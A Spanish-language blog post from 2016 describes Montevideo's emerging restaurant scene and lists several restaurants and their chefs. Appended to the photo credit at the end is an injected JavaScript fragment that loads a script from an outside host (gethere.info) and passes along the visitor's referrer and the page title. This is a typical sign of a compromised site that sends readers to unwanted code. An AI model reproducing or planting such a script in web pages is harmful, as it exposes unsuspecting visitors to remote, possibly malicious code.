Revolución culinaria en Montevideo

18/01/2016

Cuchillo de Cocina [B&W]

Hasta hace bien poco el lugar que Uruguay y su capital, Montevideo, ocupaban en la escena gastronómica mundial era un lugar tan poco importante como conocido. Hasta tal punto que ni siquiera sus platos más elaborados y tradicionales eran un verdadero punto de referencia para nadie.

Sin embargo, parece que ahora algo comienza a ebullir y a fluir en la cocinas cocinas de Montevideo. La aparición de chefs nuevos e innovadores, sumados a una rompedora tendencia por las cenas pop-up en clubes de la ciudad, han tenido mucho que ver.

Hagamos pues un repaso por algunos de los lugares de Montevideo a donde esta revolución culinaria ya ha llegado:

  • Restaurante Jacinto. La chef Lucía Soria lleva la batuta de su cocina. El local de dos plantas está situado en Ciudad Vieja, uno de los barrios históricos más importantes de la ciudad. Esta discípula del argentino Francis Mallmann se inspiró de hecho en el entorno del local para dar rienda suelta a su creatividad en la cocina: art déco en medio de un casco antiguo.
  • Restaurante Estrecho. Cocina abierta tras una barra infinita en la que te sientas tanto para observar cómo cocinan como para disfrutar a continuación de los platos elegidos. Tendencia europea en el planteamiento del local así como en el sabor de su cocina.
  • Restaurante La Fonda. También en Ciudad Vieja, muy cerca de la calle Pérez Castellano, una de sus calles peatonales más emblemáticas. Este sitio es perfecto para esos almuerzos interminables de fin de semana tan típicos del uruguayo. Mario Mori dirige su cocina abierta al son de verduras asadas, pan recién horneado y pasta fresca.
  • Restaurante Tona. El afamado chef Hugo Soca está detrás de uno de los proyectos más novedosos de la ciudad. Su menú basado en la cocina uruguaya tradicional figura en las listas top ten de restaurantes de la ciudad.
  • Restaurante Candy Bar. Dos cosas destacamos de este restaurante: su brunch -algo de momento poco usual y típico de Uruguay- y sus explosivos cócteles con esencia de jengibre y cardamomo.
  • Restaurante Mesabrava. Gente muy joven y con muchas ganas de innovar está detrás de este local cuyo mejor adjetivo para definirlo sería itinerante: se ofrecen cenas cada mes en un lugar diferente y sus comensales no saben lo que van a degustar hasta el último momento. Una experiencia única y sorprendente que, parece, está enganchando al uruguayo más atrevido.

Foto | José Carlos Cortizo Pérezs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;